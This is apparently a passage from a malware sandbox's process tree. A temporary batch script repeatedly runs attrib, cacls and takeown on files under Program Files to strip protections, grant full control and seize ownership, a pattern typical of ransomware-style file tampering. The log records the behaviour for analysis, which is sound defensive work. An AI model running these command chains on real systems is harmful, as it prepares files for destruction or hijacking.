    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado26.tlb""
  2⤵
  PID:1584
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado26.tlb"
    3⤵
    PID:240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msado26.tlb" /E /G Admin:F /C
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado26.tlb"
    3⤵
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado27.tlb""
  2⤵
  PID:1816
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado27.tlb"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msado27.tlb" /E /G Admin:F /C
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado27.tlb"
    3⤵
    PID:524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado28.tlb""
  2⤵
  PID:1904
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado28.tlb"
    3⤵
    PID:812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msado28.tlb" /E /G Admin:F /C
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado28.tlb"
    3⤵
    PID:1472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msadomd28.tlb""
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msadomd28.tlb"
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msadomd28.tlb" /E /G Admin:F /C
    3⤵
    PID:676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msadomd28.tlb"
    3⤵
    PID:108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msadox28.tlb""
  2⤵
  PID:1448
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msadox28.tlb"
    3⤵
    - Views/modifies file attributes
    PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msadox28.tlb" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msadox28.tlb"
    3⤵
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui""
  2⤵
  PID:1372
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui"
    3⤵
    PID:1484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\adcjavas.inc""
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\adcjavas.inc"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\adcjavas.inc" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\adcjavas.inc"
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\adcvbs.inc""
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\adcvbs.inc"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\adcvbs.inc" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\adcvbs.inc"
    3⤵
    PID:432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui"
    3⤵
    - Drops file in Program Files directory
    PID:1776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui"
    3⤵
    PID:556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui""
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui"
    3⤵
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui"
    3⤵
    PID:816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui""
  2⤵
  PID:368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui"
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui"
    3⤵
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\msadc\en-US\msdaremr.dll.mui""
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\msadc\en-US\msdaremr.dll.mui"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\msadc\en-US\msdaremr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\msadc\en-US\msdaremr.dll.mui"
    3⤵
    PID:1372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui"
    3⤵
    PID:2016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui""
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui"
    3⤵
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui""
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui"
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui"
    3⤵
    - Modifies file permissions
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc""
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc"
    3⤵
    - Modifies file permissions
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc"
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\sqloledb.rll""
  2⤵
  PID:368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\sqloledb.rll"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\sqloledb.rll" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\sqloledb.rll"
    3⤵
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll"
    3⤵
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\audiodepthconverter.ax""
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\audiodepthconverter.ax"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\audiodepthconverter.ax" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\audiodepthconverter.ax"
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\bod_r.TTF""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\bod_r.TTF"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\bod_r.TTF" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\bod_r.TTF"
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\directshowtap.ax""
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\directshowtap.ax"
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\directshowtap.ax" /E /G Admin:F /C
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\directshowtap.ax"
    3⤵
    PID:1668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\en-US\DVDMaker.exe.mui""
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\en-US\DVDMaker.exe.mui"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\en-US\DVDMaker.exe.mui" /E /G Admin:F /C
    3⤵
    PID:524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\en-US\DVDMaker.exe.mui"
    3⤵
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\en-US\OmdProject.dll.mui""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\en-US\OmdProject.dll.mui"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\en-US\OmdProject.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\en-US\OmdProject.dll.mui"
    3⤵
    PID:816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\en-US\WMM2CLIP.dll.mui""
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\en-US\WMM2CLIP.dll.mui"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\en-US\WMM2CLIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\en-US\WMM2CLIP.dll.mui"
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Eurosti.TTF""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Eurosti.TTF"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Eurosti.TTF" /E /G Admin:F /C
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Eurosti.TTF"
    3⤵
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\fieldswitch.ax""
  2⤵
  PID:368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\fieldswitch.ax"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\fieldswitch.ax" /E /G Admin:F /C
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\fieldswitch.ax"
    3⤵
    PID:1372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\offset.ax""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\offset.ax"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\offset.ax" /E /G Admin:F /C
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\offset.ax"
    3⤵
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\rtstreamsink.ax""
  2⤵
  PID:1880
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\rtstreamsink.ax"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\rtstreamsink.ax" /E /G Admin:F /C
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\rtstreamsink.ax"
    3⤵
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\rtstreamsource.ax""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\rtstreamsource.ax"
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\rtstreamsource.ax" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\rtstreamsource.ax"
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\SecretST.TTF""
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\SecretST.TTF"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\SecretST.TTF" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\SecretST.TTF"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\Common.fxh""
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\Common.fxh"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\Common.fxh" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\Common.fxh"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DissolveAnother.png""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DissolveAnother.png"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DissolveAnother.png" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DissolveAnother.png"
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DissolveNoise.png""
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DissolveNoise.png"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DissolveNoise.png" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DissolveNoise.png"
    3⤵
    PID:676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png"
    3⤵
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png""
  2⤵
  PID:368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png"
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png"
    3⤵
    - Views/modifies file attributes
    PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png"
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png""
  2⤵
  PID:432
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png"
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png"
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png""
  2⤵
  PID:1848
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png"
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
